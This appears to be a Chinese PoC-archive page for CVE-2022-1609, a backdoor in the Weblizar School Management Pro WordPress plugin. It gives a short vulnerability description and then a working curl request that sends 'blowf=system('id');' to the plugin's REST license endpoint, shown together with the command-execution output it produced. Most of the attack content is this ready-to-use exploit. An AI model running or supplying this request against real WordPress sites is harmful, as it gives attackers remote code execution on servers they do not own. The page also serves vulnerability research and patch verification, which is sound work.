POC详情: cdac0ae6cca67a8fd237c671b6603721d54e2838

来源
https://github.com/savior-only/CVE-2022-1609
关联漏洞
标题: School Management Pro 代码注入漏洞 (CVE-2022-1609)
描述:weblizar School Management Pro是印度weblizar公司的一个 WordPress 插件。用于管理学校及其实体。 School Management Pro 6.0版本至9.9.6版本存在代码注入漏洞,该漏洞源于 REST API 中的模糊后门问题,远程攻击者利用该漏洞可在目标系统上执行任意代码。
描述
CVE-2022-1609 WordPress Weblizar后门
介绍
# CVE-2022-1609
CVE-2022-1609 WordPress Weblizar后门


curl -s -d 'blowfish=1' -d "blowf=system('id');" 'http://localhost:8888/wp-json/am-member/license'

uid=33(www-data) gid=33(www-data) groups=33(www-data)
文件快照

 [4.0K]  /data/pocs/cdac0ae6cca67a8fd237c671b6603721d54e2838
└── [ 211]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。